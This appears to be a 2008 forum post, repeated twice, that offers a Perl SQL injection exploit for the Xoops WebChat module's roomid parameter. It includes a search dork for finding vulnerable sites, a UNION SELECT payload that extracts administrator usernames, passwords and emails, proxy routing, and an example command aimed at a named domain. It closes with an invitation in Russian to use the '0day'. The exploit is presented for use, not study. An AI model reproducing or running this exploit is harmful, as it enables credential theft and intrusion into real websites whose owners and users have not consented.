ZAMUT
20.07.2008, 17:47
Xoops WebChat
Version: latest -- 1.60
Dork: inurl:/modules/WebChat/ roomid
#!/usr/bin/perl
use LWP::UserAgent;
use strict;
my ($path,$proxy,$ua,$answ,$upe,$u,$p,$e);
my $path = shift;
my $proxy = shift;
&usage;
if(!$ARGV[1]) {print "\n\nProxy not found :d";}
else {print "\n\nProxy found, $ARGV[1]";}
print "\n\n[~]Waiting...\n[~]Getting administrators data -- [uname, pass, email]";
$ua=LWP::UserAgent->new;
$ua->agent("Mozilla/4.0");
if($proxy){
$ua->proxy('http',"http://".$proxy."/");
}
$answ = $ua->get("http://$path/index.php?roomid=-2222+union+select+1,unhex(hex(concat(0x3A3A3A,unam e,0x3a,pass,0x3a,email,0x3A3A3A))),3,4,5+from+xoop s_users+limit+0,1")->content;
$answ =~m#:::(.+):::#;
$upe = $1;
if(!$1) {print "\nExploit failed!";}
else { ($u,$p,$e) = split(':',$upe); print "\n\nlogin: $u\npassword: $p\nemail: $e\n"; }
sub usage
{
print q
{
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::
Xoops WebChat SQL Injection Exploit (roomid)
Author: ZAMUT
Vuln: roomid=
Homepage: http://antichat.ru
Usage: exploit.pl [path] [proxy]
Example:
perl exploit.pl trick-click.com/exoops/modules/WebChat 62.123.110.134:8080
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::
};
}
0day, пользуемся
Version: latest -- 1.60
Dork: inurl:/modules/WebChat/ roomid
#!/usr/bin/perl
use LWP::UserAgent;
use strict;
my ($path,$proxy,$ua,$answ,$upe,$u,$p,$e);
my $path = shift;
my $proxy = shift;
&usage;
if(!$ARGV[1]) {print "\n\nProxy not found :d";}
else {print "\n\nProxy found, $ARGV[1]";}
print "\n\n[~]Waiting...\n[~]Getting administrators data -- [uname, pass, email]";
$ua=LWP::UserAgent->new;
$ua->agent("Mozilla/4.0");
if($proxy){
$ua->proxy('http',"http://".$proxy."/");
}
$answ = $ua->get("http://$path/index.php?roomid=-2222+union+select+1,unhex(hex(concat(0x3A3A3A,unam e,0x3a,pass,0x3a,email,0x3A3A3A))),3,4,5+from+xoop s_users+limit+0,1")->content;
$answ =~m#:::(.+):::#;
$upe = $1;
if(!$1) {print "\nExploit failed!";}
else { ($u,$p,$e) = split(':',$upe); print "\n\nlogin: $u\npassword: $p\nemail: $e\n"; }
sub usage
{
print q
{
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::
Xoops WebChat SQL Injection Exploit (roomid)
Author: ZAMUT
Vuln: roomid=
Homepage: http://antichat.ru
Usage: exploit.pl [path] [proxy]
Example:
perl exploit.pl trick-click.com/exoops/modules/WebChat 62.123.110.134:8080
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::
};
}
0day, пользуемся